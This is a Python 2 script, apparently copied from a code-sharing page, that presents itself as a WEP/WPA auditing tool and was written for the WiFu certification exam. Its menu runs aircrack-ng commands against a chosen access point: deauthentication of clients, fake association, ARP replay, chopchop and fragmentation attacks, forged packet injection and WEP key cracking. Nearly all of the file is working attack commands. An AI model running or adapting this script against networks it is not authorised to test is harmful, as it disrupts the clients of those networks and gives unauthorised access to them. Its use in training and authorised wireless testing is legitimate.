1. #!/usr/bin/python
  2. # WEP and WPA Auditing tool
  3. # Coded by MrMe
  4. # Uses aircrack-ng 'http://aircrack-ng.org/doku.php'
  5. # WARNING: This script assumes you know something about wifi
  6. # I write this script because I cant remember syntax :(
  7. # Also made to destroy the wifu exam
  8. #
  10. import hashlib, sys, os,fileinput, re, time, thread
  11. from optparse import OptionParser
  13. usage= "./%prog -i interface"
  14. usage = usage+"\nExample: ./%prog -i ath0"
  15. parser = OptionParser(usage=usage)
  16. parser.add_option("-i", type="string",
  17. action="store", dest="intf",
  18. help="Your interface")
  19. (options, args) = parser.parse_args()
  21. def banner():
  22. print "\n|---------------------------------------------------|"
  23. print "| WEP & WPA auditing tool made during WIFU :) |"
  24. print "| by MrMe 07/2009 |"
  25. print "|---------------------------------------------------|\n"
  27. def is_there_aircrack():
  28. booya = os.popen("aircrack-ng")
  29. if not re.search("http://www.aircrack-ng.org",booya.read()):
  30. banner()
  31. print "[-] Please install aircrack-ng before continuing"
  32. print "[-] apt-get install aircrack-ng"
  33. print "[-] yum install aircrack-ng"
  34. sys.exit(0)
  36. if len(sys.argv) != 3:
  37. banner()
  38. parser.print_help()
  39. sys.exit(1)
  41. # some global variables
  42. verbose = 'true'
  43. intf = options.intf
  45. def reset():
  46. if intf == 'ath0':
  47. unload = os.system("rmmod ath_pci")
  48. load = os.system("modprobe ath_pci")
  49. print "\n[+] Loaded and ready"
  50. elif intf == 'wlan0':
  51. unload = os.system("rmmod r8187")
  52. load = os.system("modprobe r8187")
  53. print "\n[+] Loaded and ready"
  54. else:
  55. print "[-] Interface not supported for this option"
  57. def targetSetup():
  58. kill = os.system("airmon-ng stop "+intf)
  59. if intf == 'ath0':
  60. exe = os.system('airmon-ng start wifi0')
  61. else:
  62. exe = os.system('airmon-ng start '+intf)
  64. def execute():
  65. run = 'on'
  66. while run == 'on':
  67. print "\n|--------------------------------|"
  68. print "| Select an option type |"
  69. print "|--------------------------------|\n"
  70. print "[1] Reset the driver modules"
  71. print "[2] Setup wifi NIC and choose target"
  72. print "[3] Injection test against target"
  73. print "[4] De-authenticate a client"
  74. print "[5] Fake associate with the AP"
  75. print "[6] Shared key fake association"
  76. print "[7] Interactive packet replay"
  77. print "[8] Arp request replay"
  78. print "[9] Korek chop chop attack"
  79. print "[10] Fragmentation attack"
  80. print "[11] Forge and inject using the xor file"
  81. print "[12] Crack the WEP key"
  82. print "[13] Exit\n"
  83. option=raw_input('[+] Please enter a value: ')
  85. if option == '13':
  86. print "[+] Hope you had fun"
  87. sys.exit(0)
  88. if option == '1':
  89. reset()
  90. if option == '2':
  91. targetSetup()
  92. print "\n[+] Gathering target information.."
  93. airo = 'xterm -T "Searching for target AP\'s" -e airodump-ng '+intf
  94. exec_=os.popen(airo)
  95. time.sleep(3)
  96. ch=raw_input('[+] Please enter target channel: ')
  97. ch = str(ch)
  98. bssid=raw_input('[+] Please enter the target BSSID: ')
  99. while len(bssid) != 17:
  100. print '\n[-] Check your BSSID and enter it again. Eg: 00:1b:2f:67:9b:f3'
  101. bssid=raw_input('[+] Please enter the target BSSID: ')
  102. essid=raw_input('[+] Please enter the target ESSID: ')
  103. mymac=raw_input('[+] Please enter the MAC addess for '+intf+': ')
  104. while len(mymac) != 17:
  105. print '\n[-] Check your MAC address and enter it again. Eg: 00:1b:2f:67:9b:f3'
  106. mymac=raw_input('[+] Please enter the MAC addess for '+intf+': ')
  107. if not bssid or not essid or not ch:
  108. print '\n[-] Please enter the details correctly next time.. exiting..'
  109. sys.exit(0)
  110. print "[+] Setting up your interface for the specifid target.."
  111. kill = os.system("airmon-ng stop "+intf)
  112. if intf == 'ath0':
  113. cmd = 'airmon-ng start wifi0 '+ch
  114. exe = os.system(cmd)
  115. else:
  116. exe = os.system('airmon-ng start '+intf+' '+ch)
  117. dump = 'xterm -T "Dumping target" -e airodump-ng -c '+ch+' --bssid '+bssid+' -w '+essid+' '+intf+' &'
  118. exe_dump = os.system(dump)
  119. time.sleep(3)
  120. print '\n[+] Ready to rock and roll! :)'
  121. if option == '3':
  122. print "[+] Testing AP please wait.."
  123. test1 = 'aireplay-ng -9 -e "'+essid+'" -a '+bssid+' '+intf
  124. test = os.popen(test1)
  125. if verbose == 'true':
  126. print "[+] Command: "+test1+'\n'
  127. print test.read()
  128. if re.search("No such BSSID",test.read()):
  129. print "[-] Please check your BSSID!"
  130. sys.exit(0)
  131. else:
  132. print "[+] Injection is working!"
  133. if option == '4':
  134. client=raw_input('[+] Please enter the targets clients MAC: ')
  135. print "[+] Deauth'ing with 1 packets please wait.."
  136. attack2 = 'aireplay-ng -0 1 -e "'+essid+'" -a '+bssid+' -c '+client+' '+intf
  137. exe = os.popen(attack2)
  138. if verbose == 'true':
  139. print '[+] Command: "'+attack2+'"\n'
  140. print exe.read()
  141. if option == '5':
  143. print "[+] Associating with the AP please wait.."
  144. test1 = 'aireplay-ng -1 0 -e "'+essid+'" -a '+bssid+' -h '+mymac+' '+intf
  145. test = os.popen(test1)
  146. if verbose == 'true':
  147. print '[+] Command: "'+test1+'"\n'
  148. print test.read()
  149. if option == '6':
  150. print "[+] Associating with the AP please wait.."
  151. print "[+] Using shared key.."
  152. asso = 'aireplay-ng -1 0 -e "'+essid+'" -y '+essid+'*.xor -a '+bssid+' -h '+mymac+' '+intf
  153. exec_shaasso = os.popen(asso)
  154. if verbose == 'true':
  155. print '[+] Command: "'+asso+'"\n'
  156. print exec_shaasso.read()
  157. if option == '7':
  158. print "[+] Starting interactive packet replay attack.."
  159. inter = 'aireplay-ng -2 -b '+bssid+' -d FF:FF:FF:FF:FF:FF -t 1 '+intf
  160. if verbose == 'true':
  161. print "[+] Command: "+inter+'\n'
  162. print "[+] Now try deauth'ing a client or wait.."
  163. print "[+] If you get a ARP packet then crack the key"
  164. exe = os.system(inter)
  165. if option == '8':
  166. print "[+] Starting ARP request replay attack.."
  167. print "[+] If you get a ARP packet then crack the key"
  168. arp = 'aireplay-ng -3 -b '+bssid+' -h '+mymac+' '+intf
  169. if verbose == 'true':
  170. print "[+] Command: "+arp+'\n'
  171. test = os.system(arp)
  172. if option == '9':
  173. print "[+] Starting Korek chop chop attack.."
  174. chop = 'aireplay-ng -4 -h '+mymac+' -b '+bssid+' '+intf
  175. if verbose == 'true':
  176. print '[+] Command: "'+chop+'"\n'
  177. exe = os.system(chop)
  178. if option == '10':
  179. print "[+] Starting fragmentation attack.."
  180. frag = 'aireplay-ng -5 -b '+bssid+' -h '+mymac+' '+intf
  181. if verbose == 'true':
  182. print '[+] Command: "'+frag+'"\n'
  183. exe = os.system(frag)
  184. if option == '11':
  185. print "[+] Forging arbitary data packet.."
  186. forge = 'packetforge-ng -0 -a '+bssid+' -h '+mymac+' -k -l -y *.xor -w arp-request'
  187. if verbose == 'true':
  188. print '[+] Command: "'+forge+'"\n'
  189. exe = os.system(forge)
  190. print "[+] Now lets inject the forged packet :)"
  191. inject = 'xterm -T "Injecting forged packet" -e "aireplay-ng -2 -r arp-request "'+intf+' &'
  192. exe_dump = os.system(inject)
  193. time.sleep(3)
  194. if option == '12':
  195. print "[+] Crack time!"
  196. print "[+] aircrack-ng -0 -z "+essid+"*.cap\n"
  197. crack = 'xterm -T "Cracking.." -e "aircrack-ng -0 -z '+essid+'*.cap; bash"\n'
  198. exe_crack = os.system(crack)
  199. is_there_aircrack()
  200. banner()
  201. execute()